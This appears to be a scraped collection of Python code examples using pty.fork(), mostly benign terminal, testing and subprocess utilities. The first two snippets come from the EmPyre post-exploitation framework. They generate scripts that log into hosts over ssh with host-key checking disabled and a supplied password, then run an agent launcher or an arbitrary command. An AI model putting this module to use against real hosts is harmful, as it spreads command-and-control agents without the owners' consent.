def generate(self):
    """Build a Python script that runs an EmPyre launcher on a host over ssh.

    Reads the ``Login``, ``Password``, ``Listener``, ``UserAgent`` and
    ``LittleSnitch`` values from ``self.options``, asks
    ``self.mainMenu.stagers`` for a launcher for the listener, and embeds
    the launcher, login and password into a script template that drives
    ``ssh`` through ``pty.fork()``.

    Returns:
        The generated script text, or ``""`` when the listener is not an
        EmPyre listener or no launcher could be generated.
    """
    def _quote(value):
        # Escape a value for embedding inside a single-quoted literal of the
        # generated script.  Backslashes go first so the escapes added for
        # the other characters are not themselves doubled.
        text = "%s" % (value,)
        for raw, escaped in (("\\", "\\\\"), ("'", "\\'"),
                             ("\n", "\\n"), ("\r", "\\r")):
            text = text.replace(raw, escaped)
        return text

    login = self.options['Login']['Value']
    password = self.options['Password']['Value']
    listenerName = self.options['Listener']['Value']
    userAgent = self.options['UserAgent']['Value']
    littleSnitch = self.options['LittleSnitch']['Value']

    isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
    if not isEmpire:
        print(helpers.color("[!] EmPyre listener required!"))
        return ""

    # generate the launcher code
    launcher = self.mainMenu.stagers.generate_launcher(
        listenerName, userAgent=userAgent, littlesnitch=littleSnitch)
    # Check before escaping so an empty or missing launcher is reported
    # instead of failing on .replace().
    if not launcher:
        print(helpers.color("[!] Error in launcher command generation."))
        return ""
    launcher = launcher.replace("'", "\\'")
    launcher = launcher.replace('"', '\\"')

    # The template is the text of the script that gets returned; the three
    # %s slots are the remote command, the ssh target and the password.
    script = """
import os
import pty
def wall(host, pw):
    import os,pty
    pid, fd = pty.fork()
    if pid == 0:
        os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
        os._exit(1)
    os.read(fd, 1024)
    os.write(fd, '\\n' + pw + '\\n')
    result = []
    while True:
        try:
            data = os.read(fd, 1024)
            if data == "Password:":
                os.write(fd, pw + '\\n')
        except OSError:
            break
        if not data:
            break
        result.append(data)
    pid, status = os.waitpid(pid, 0)
    return status, ''.join(result)
status, output = wall('%s','%s')
print status
print output
""" % (launcher, _quote(login), _quote(password))
    return script
# python类fork()的实例源码 (example source code using Python's fork())
def generate(self):
    """Build a Python script that runs a command on a host over ssh.

    Reads the ``Login``, ``Password`` and ``Command`` values from
    ``self.options`` and embeds them into a script template that drives
    ``ssh`` through ``pty.fork()``.

    Returns:
        The generated script text.
    """
    def _quote(value):
        # Escape a value for embedding inside a single-quoted literal of the
        # generated script.  Backslashes go first so the escapes added for
        # the other characters are not themselves doubled.
        text = "%s" % (value,)
        for raw, escaped in (("\\", "\\\\"), ("'", "\\'"),
                             ("\n", "\\n"), ("\r", "\\r")):
            text = text.replace(raw, escaped)
        return text

    login = self.options['Login']['Value']
    password = self.options['Password']['Value']
    command = self.options['Command']['Value']

    # generate the launcher code
    # The template is the text of the script that gets returned; the three
    # %s slots are the remote command, the ssh target and the password.
    script = """
import os
import pty
def wall(host, pw):
    import os,pty
    pid, fd = pty.fork()
    if pid == 0: # Child
        os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
        os._exit(1) # fail to execv
    # read '..... password:', write password
    os.read(fd, 1024)
    os.write(fd, '\\n' + pw + '\\n')
    result = []
    while True:
        try:
            data = os.read(fd, 1024)
            if data == "Password:":
                os.write(fd, pw + '\\n')
        except OSError:
            break
        if not data:
            break
        result.append(data)
    pid, status = os.waitpid(pid, 0)
    return status, ''.join(result)
status, output = wall('%s','%s')
print status
print output
""" % (_quote(command), _quote(login), _quote(password))
    return script
def open(self, command, env=None):
    """ Create subprocess using forkpty()

    The command string is split with ``shlex.split``; its first word is the
    executable and the full word list is passed as argv.  On a successful
    fork the child's pid and the pty master descriptor are stored in
    ``self.pid`` and ``self.fd``.

    Args:
        command: Shell-like command line to run in the new pty.
        env: Optional mapping of environment variables to set in the child
            before exec.

    Returns:
        ``False`` when the command is empty or the pty could not be forked.
        In the parent after a successful fork nothing is returned (``None``).
        The child never returns: it either becomes the command or exits.
    """
    # parse command
    command_arr = shlex.split(command)
    if not command_arr:
        # Nothing to execute; report failure the same way a failed fork does.
        return False
    executable = command_arr[0]

    # try to fork a new pty
    try:
        self.pid, self.fd = pty.fork()
    except (OSError, AttributeError):
        return False

    # In the parent there is nothing more to do.
    if self.pid != 0:
        return

    # child proc, replace with command after altering terminal attributes
    try:
        # set requested environment variables
        for key, value in (env or {}).items():
            os.environ[key] = value

        # set tty attributes (best effort: a failure here must not prevent
        # the command from being started)
        try:
            attrs = tty.tcgetattr(1)
            # Clear IGNBRK; XOR would switch it on when it was not set.
            attrs[0] = attrs[0] & ~tty.IGNBRK
            attrs[0] = attrs[0] | tty.BRKINT | tty.IXANY | tty.IMAXBEL
            attrs[2] = attrs[2] | tty.HUPCL
            attrs[3] = attrs[3] | tty.ICANON | tty.ECHO | tty.ISIG | tty.ECHOKE
            attrs[6][tty.VMIN] = 1
            attrs[6][tty.VTIME] = 0
            tty.tcsetattr(1, tty.TCSANOW, attrs)
        except Exception:
            pass

        # replace this process with the subprocess
        os.execvp(executable, command_arr)
    except Exception:
        import traceback
        traceback.print_exc()
    finally:
        # Only reached when exec failed: never let the forked child fall
        # back into the caller's code.
        os._exit(127)
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None):
    """Check that input() in a pty child returns what was typed at the terminal.

    A child is forked on a new pty.  It optionally rewraps its standard
    streams with ``stdio_encoding``, calls ``input(prompt)`` and reports two
    lines back through a pipe: whether its stdio are ttys, and the ascii()
    form of what input() returned.  The parent writes ``terminal_input`` to
    the pty and compares the reported value with the decoded input.

    The test is skipped when stdin/stdout are not ttys, when pty.fork()
    is unavailable or fails, or when the child's stdio were not ttys.
    """
    if not (sys.stdin.isatty() and sys.stdout.isatty()):
        self.skipTest("stdin and stdout must be ttys")

    read_end, write_end = os.pipe()
    try:
        pid, master_fd = pty.fork()
    except (OSError, AttributeError) as exc:
        os.close(read_end)
        os.close(write_end)
        self.skipTest("pty.fork() raised {}".format(exc))

    if pid == 0:
        # Child process
        try:
            # Safety net so a stuck child cannot hang the run
            signal.alarm(2)
            os.close(read_end)
            # Rewrap stdio so the error handlers are exercised as well
            if stdio_encoding:
                sys.stdin = io.TextIOWrapper(sys.stdin.detach(),
                                             encoding=stdio_encoding,
                                             errors='surrogateescape')
                sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
                                              encoding=stdio_encoding,
                                              errors='replace')
            with open(write_end, "w") as wpipe:
                print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe)
                print(ascii(input(prompt)), file=wpipe)
        except BaseException:
            traceback.print_exc()
        finally:
            # Never fall back into the unittest machinery from the child
            os._exit(0)

    # Parent process
    os.close(write_end)
    os.write(master_fd, terminal_input + b"\r\n")

    # Collect the child's report; an empty (stripped) line means the write
    # end was closed, i.e. the child has exited.
    lines = []
    with open(read_end, "r") as rpipe:
        for reported in iter(lambda: rpipe.readline().strip(), ""):
            lines.append(reported)

    # Exactly two lines are expected; otherwise surface whatever the child
    # printed on its terminal.
    if len(lines) != 2:
        with open(master_fd, "r", encoding="ascii", errors="ignore") as child_output:
            self.fail("got %d lines in pipe but expected 2, child output was:\n%s"
                      % (len(lines), child_output.read()))
    os.close(master_fd)

    # Make sure the tty code path was really taken
    self.assertIn(lines[0], {'tty = True', 'tty = False'})
    if lines[0] != 'tty = True':
        self.skipTest("standard IO in should have been a tty")

    input_result = eval(lines[1])  # undo the child's ascii()
    if stdio_encoding:
        codec_args = (stdio_encoding, 'surrogateescape')
    else:
        codec_args = (sys.stdin.encoding,)  # what else?
    expected = terminal_input.decode(*codec_args)
    self.assertEqual(input_result, expected)
def __pty_make_controlling_tty(self, tty_fd):
    '''This makes the pseudo-terminal the controlling tty. This should be
    more portable than the pty.fork() function. Specifically, this should
    work on Solaris.

    tty_fd is an open descriptor for the pseudo-terminal; its device name
    is looked up with os.ttyname() and reopened after os.setsid().

    Raises Exception if /dev/tty can still be opened after os.setsid(),
    and OSError (from os.open) if the child pty or the new controlling
    tty cannot be opened. '''
    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty. Harmless if not already connected.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        os.close(fd)
    except OSError:
        # Already disconnected. This happens if running inside cron.
        pass

    os.setsid()

    # Verify we are disconnected from controlling tty
    # by attempting to open it again.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
    except OSError:
        # Good! We are disconnected from a controlling tty.
        pass
    else:
        # The open succeeded, so a controlling tty is still attached.
        os.close(fd)
        raise Exception('Failed to disconnect from ' +
            'controlling tty. It is still possible to open /dev/tty.')

    # Verify we can open child pty.  os.open() raises OSError on failure
    # (it never returns a negative descriptor), so no result check is needed.
    fd = os.open(child_name, os.O_RDWR)
    os.close(fd)

    # Verify we now have a controlling tty.
    fd = os.open("/dev/tty", os.O_WRONLY)
    os.close(fd)
def ptyPopen(args, executable=None, env=None, shell=False):
    """Less featureful but inspired by subprocess.Popen.
    Runs subprocess in a pty

    Args:
        args: A command string or a sequence of argv words.
        executable: Optional program to execute; defaults to ``args[0]``.
        env: Optional environment mapping for the child; when ``None`` the
            child is started with ``os.execvp`` and no explicit environment.
        shell: When true, run ``args`` through ``/bin/sh -c``.

    Returns:
        A ``(retcode, output)`` tuple: the child's wait status shifted right
        by 8 bits, and everything read from the pty master as bytes.
    """
    #
    # Note: In theory the right answer here is to subclass Popen,
    # but we found that in practice we'd have to reimplement most
    # of that class, because its handling of file descriptors is
    # too brittle in its _execute_child() code.
    #
    def _drain(master_fd, outlist):
        # Use a list as a way to pass by reference
        while True:
            try:
                termdata = os.read(master_fd, 1024)
            except OSError:
                # Reading the master can fail instead of reporting EOF once
                # the other side is closed; treat that as end of output.
                break
            if not termdata:
                break
            outlist.append(termdata)

    # This is the arg handling protocol from Popen
    if isinstance(args, six.string_types):
        args = [args]
    else:
        args = list(args)

    if shell:
        args = ["/bin/sh", "-c"] + args
        if executable:
            args[0] = executable

    if executable is None:
        executable = args[0]

    pid, fd = pty.fork()
    if pid == 0:
        # Child
        try:
            if env is None:
                os.execvp(executable, args)
            else:
                os.execvpe(executable, args, env)
        except Exception:
            traceback.print_exc()
        finally:
            # Only reached when exec failed; never return into the caller.
            os._exit(99)
    else:
        outlist = []
        t = threading.Thread(target=_drain, args=(fd, outlist))
        t.start()
        waitedpid, retcode = os.waitpid(pid, 0)
        retcode = retcode >> 8
        t.join()
        # Release the pty master explicitly instead of leaving it open.
        os.close(fd)
        return retcode, b"".join(outlist)
def fakeroot_create():
    """Create a temporary "fakeroot" image holding a copy of the pkg command.

    The image lives under ``g_tempdir`` in a directory named after the
    current process id.

    Returns:
        A ``(fakeroot, fakeroot_cmdpath)`` tuple: the image directory and
        the path of the pkg command copied into it.

    Raises:
        RuntimeError: if the pkg command path inside the fakeroot already
            exists.
    """
    test_root = os.path.join(g_tempdir,
        "ips.test.{0:d}".format(os.getpid()))
    fakeroot = os.path.join(test_root, "fakeroot")
    cmd_path = os.path.join(fakeroot, "pkg")

    # A successful stat means a previous fakeroot is still around.
    try:
        os.stat(cmd_path)
    except OSError:
        already_exists = False
    else:
        already_exists = True
    if already_exists:
        raise RuntimeError("The fakeroot shouldn't already exist.\n"
            "Path is:{0}".format(cmd_path))

    # Sanitize the environment first so that creating the fakeroot does
    # not make pkg touch the real root.
    env_sanitize(cmd_path)

    #
    # The pkg APIs try to access the image that contains the command
    # they were invoked from.  During a test run that command is
    # normally run.py in a developer's workspace inside the root image,
    # which must not be accessed here, so a temporary image is created
    # for the pkg command to run from instead.
    #
    for directory in (test_root, fakeroot):
        mkdir_eexist_ok(directory)
    debug("fakeroot image create {0}".format(fakeroot))

    # The returned API object is not used further; it is only kept bound
    # for the rest of the function, as before.
    api_inst = pkg.client.api.image_create(PKG_CLIENT_NAME,
        CLIENT_API_VERSION, fakeroot,
        pkg.client.api.IMG_TYPE_ENTIRE, False,
        progtrack=pkg.client.progress.NullProgressTracker(),
        cmdpath=cmd_path)

    #
    # Recursive linked image commands may fork and exec further copies
    # of pkg(1); placing a copy of the command inside the fake root
    # makes them run that copy.
    #
    fakeroot_cmdpath = os.path.join(fakeroot, "pkg")
    pkg_source = os.path.join(g_pkg_path, "usr", "bin", "pkg")
    shutil.copy(pkg_source, fakeroot_cmdpath)

    return fakeroot, fakeroot_cmdpath